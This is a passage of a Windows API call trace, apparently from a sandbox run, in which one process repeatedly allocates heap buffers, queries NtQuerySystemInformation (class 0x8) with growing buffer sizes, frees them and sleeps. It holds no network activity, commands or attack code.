[0306.252] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ba68, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295ba68, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0306.252] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ba68 | out: hHeap=0x2560000) returned 1 [0306.252] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cf40 [0306.252] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cf40, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cf40, ResultLength=0x19ee88*=0xc0) returned 0x0 [0306.253] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cf40 | out: hHeap=0x2560000) returned 1 [0306.253] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x27dc4e0 [0306.253] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x27dc4e0 | out: hHeap=0x2560000) returned 1 [0306.253] Sleep (dwMilliseconds=0x110) [0306.266] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d788 [0306.266] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d788, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d788, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0306.267] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d788 | out: hHeap=0x2560000) returned 1 [0306.267] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a5a8 [0306.267] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a5a8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a5a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0306.267] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a5a8 | out: hHeap=0x2560000) returned 1 [0306.267] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bb98 [0306.267] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bb98, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bb98, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0306.268] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bb98 | out: hHeap=0x2560000) returned 1 [0306.268] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cce8 [0306.268] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cce8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cce8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0306.268] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cce8 | out: hHeap=0x2560000) returned 1 [0306.268] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x27e0500 [0306.269] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x27e0500 | out: hHeap=0x2560000) returned 1 [0306.269] Sleep (dwMilliseconds=0x110) [0306.282] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d558 [0306.282] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d558, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d558, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0306.283] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d558 | out: hHeap=0x2560000) returned 1 [0306.283] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a9b8 [0306.283] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a9b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a9b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0306.283] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a9b8 | out: hHeap=0x2560000) returned 1 [0306.283] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bd60 [0306.283] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bd60, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bd60, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0306.284] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bd60 | out: hHeap=0x2560000) returned 1 [0306.284] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cf40 [0306.284] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cf40, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cf40, ResultLength=0x19ee88*=0xc0) returned 0x0 [0306.284] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cf40 | out: hHeap=0x2560000) returned 1 [0306.284] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x27de4f0 [0306.285] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x27de4f0 | out: hHeap=0x2560000) returned 1 [0306.285] Sleep (dwMilliseconds=0x110) [0306.298] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d600 [0306.298] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d600, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d600, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0306.299] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d600 | out: hHeap=0x2560000) returned 1 [0306.299] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a5a8 [0306.299] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a5a8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a5a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0306.299] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a5a8 | out: hHeap=0x2560000) returned 1 [0306.299] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bb98 [0306.299] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bb98, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bb98, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0306.300] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bb98 | out: hHeap=0x2560000) returned 1 [0306.300] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ce78 [0306.300] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ce78, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ce78, ResultLength=0x19ee88*=0xc0) returned 0x0 [0306.301] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ce78 | out: hHeap=0x2560000) returned 1 [0306.301] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x27e1508 [0306.301] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x27e1508 | out: hHeap=0x2560000) returned 1 [0306.301] Sleep (dwMilliseconds=0x110) [0306.313] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d520 [0306.313] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d520, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d520, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0306.314] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d520 | out: hHeap=0x2560000) returned 1 [0306.314] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a8e8 [0306.314] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a8e8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a8e8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0306.315] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a8e8 | out: hHeap=0x2560000) returned 1 [0306.315] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b510 [0306.315] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b510, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b510, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0306.316] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b510 | out: hHeap=0x2560000) returned 1 [0306.316] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d0d0 [0306.316] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d0d0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d0d0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0306.317] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d0d0 | out: hHeap=0x2560000) returned 1 [0306.317] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x27de4f0 [0306.317] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x27de4f0 | out: hHeap=0x2560000) returned 1 [0306.317] Sleep (dwMilliseconds=0x110) [0306.328] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d8a0 [0306.328] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d8a0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d8a0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0306.329] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d8a0 | out: hHeap=0x2560000) returned 1 [0306.329] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a7b0 [0306.329] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a7b0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a7b0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0306.330] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a7b0 | out: hHeap=0x2560000) returned 1 [0306.330] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c220 [0306.330] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c220, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c220, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0306.330] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c220 | out: hHeap=0x2560000) returned 1 [0306.330] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cce8 [0306.330] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cce8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cce8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0306.331] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cce8 | out: hHeap=0x2560000) returned 1 [0306.331] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x27de4f0 [0306.331] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x27de4f0 | out: hHeap=0x2560000) returned 1 [0306.331] Sleep (dwMilliseconds=0x110) [0306.341] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d638 [0306.341] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d638, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d638, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0306.342] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d638 | out: hHeap=0x2560000) returned 1 [0306.342] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa88 [0306.342] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa88, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa88, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0306.343] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa88 | out: hHeap=0x2560000) returned 1 [0306.343] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b6d8 [0306.343] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b6d8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b6d8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0306.344] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b6d8 | out: hHeap=0x2560000) returned 1 [0306.344] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cdb0 [0306.344] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cdb0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cdb0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0306.345] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cdb0 | out: hHeap=0x2560000) returned 1 [0306.345] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x27e1508 [0306.345] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x27e1508 | out: hHeap=0x2560000) returned 1 [0306.345] Sleep (dwMilliseconds=0x110) [0306.360] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d750 [0306.360] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d750, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d750, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0306.360] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d750 | out: hHeap=0x2560000) returned 1 [0306.360] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285ab58 [0306.360] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285ab58, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285ab58, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0306.361] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285ab58 | out: hHeap=0x2560000) returned 1 [0306.361] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bb98 [0306.361] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bb98, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bb98, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0306.361] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bb98 | out: hHeap=0x2560000) returned 1 [0306.361] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ce78 [0306.361] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ce78, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ce78, ResultLength=0x19ee88*=0xc0) returned 0x0 [0306.362] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ce78 | out: hHeap=0x2560000) returned 1 [0306.362] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x27dc4e0 [0306.362] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x27dc4e0 | out: hHeap=0x2560000) returned 1 [0306.362] Sleep (dwMilliseconds=0x110) [0306.375] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d600 [0306.375] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d600, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d600, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0306.376] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d600 | out: hHeap=0x2560000) returned 1 [0306.376] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a748 [0306.376] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a748, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a748, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0306.376] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a748 | out: hHeap=0x2560000) returned 1 [0306.376] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c2b8 [0306.376] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c2b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c2b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0306.377] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c2b8 | out: hHeap=0x2560000) returned 1 [0306.377] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c838 [0306.377] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c838, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c838, ResultLength=0x19ee88*=0xc0) returned 0x0 [0306.377] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c838 | out: hHeap=0x2560000) returned 1 [0306.377] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x27de4f0 [0306.378] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x27de4f0 | out: hHeap=0x2560000) returned 1 [0306.378] Sleep (dwMilliseconds=0x110) [0306.395] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d8a0 [0306.395] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d8a0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d8a0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0306.396] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d8a0 | out: hHeap=0x2560000) returned 1 [0306.396] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285abc0 [0306.396] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285abc0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285abc0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0306.397] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285abc0 | out: hHeap=0x2560000) returned 1 [0306.397] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bb98 [0306.397] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bb98, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bb98, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0306.398] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bb98 | out: hHeap=0x2560000) returned 1 [0306.398] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d260 [0306.398] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d260, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d260, ResultLength=0x19ee88*=0xc0) returned 0x0 [0306.399] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d260 | out: hHeap=0x2560000) returned 1 [0306.404] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x27dc4e0 [0306.405] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x27dc4e0 | out: hHeap=0x2560000) returned 1 [0306.405] Sleep (dwMilliseconds=0x110) [0306.424] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d7f8 [0306.424] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d7f8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d7f8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0306.424] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d7f8 | out: hHeap=0x2560000) returned 1 [0306.424] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a818 [0306.425] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a818, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a818, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0306.425] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a818 | out: hHeap=0x2560000) returned 1 [0306.425] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b9d0 [0306.425] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b9d0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b9d0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0306.425] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b9d0 | out: hHeap=0x2560000) returned 1 [0306.426] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c6a8 [0306.426] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c6a8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c6a8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0306.426] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c6a8 | out: hHeap=0x2560000) returned 1 [0306.426] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x27dc4e0 [0306.426] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x27dc4e0 | out: hHeap=0x2560000) returned 1 [0306.426] Sleep (dwMilliseconds=0x110) [0306.438] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d788 [0306.438] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d788, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d788, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0306.439] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d788 | out: hHeap=0x2560000) returned 1 [0306.439] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa20 [0306.439] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa20, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa20, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0306.439] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa20 | out: hHeap=0x2560000) returned 1 [0306.439] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b6d8 [0306.439] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b6d8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b6d8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0306.440] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b6d8 | out: hHeap=0x2560000) returned 1 [0306.440] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cb58 [0306.440] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cb58, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cb58, ResultLength=0x19ee88*=0xc0) returned 0x0 [0306.441] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cb58 | out: hHeap=0x2560000) returned 1 [0306.441] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x27df4f8 [0306.441] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x27df4f8 | out: hHeap=0x2560000) returned 1 [0306.441] Sleep (dwMilliseconds=0x110) [0306.453] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d670 [0306.453] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d670, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d670, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0306.454] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d670 | out: hHeap=0x2560000) returned 1 [0306.454] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aaf0 [0306.454] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aaf0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aaf0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0306.454] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aaf0 | out: hHeap=0x2560000) returned 1 [0306.455] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295be90 [0306.455] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295be90, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295be90, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0306.455] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295be90 | out: hHeap=0x2560000) returned 1 [0306.455] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c5e0 [0306.455] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c5e0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c5e0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0306.456] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c5e0 | out: hHeap=0x2560000) returned 1 [0306.456] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x27e1508 [0306.457] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x27e1508 | out: hHeap=0x2560000) returned 1 [0306.457] Sleep (dwMilliseconds=0x110) [0306.470] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d670 [0306.470] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d670, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d670, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0306.470] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d670 | out: hHeap=0x2560000) returned 1 [0306.471] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a9b8 [0306.471] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a9b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a9b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0306.471] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a9b8 | out: hHeap=0x2560000) returned 1 [0306.471] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c188 [0306.471] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c188, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c188, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0306.472] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c188 | out: hHeap=0x2560000) returned 1 [0306.472] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cb58 [0306.472] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cb58, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cb58, ResultLength=0x19ee88*=0xc0) returned 0x0 [0306.473] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cb58 | out: hHeap=0x2560000) returned 1 [0306.473] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x27e1508 [0306.473] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x27e1508 | out: hHeap=0x2560000) returned 1 [0306.473] Sleep (dwMilliseconds=0x110) [0306.485] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6e0 [0306.485] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6e0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6e0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0306.486] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6e0 | out: hHeap=0x2560000) returned 1 [0306.486] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a950 [0306.486] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a950, Length=0x60, ResultLength=0x19ee88 | out: 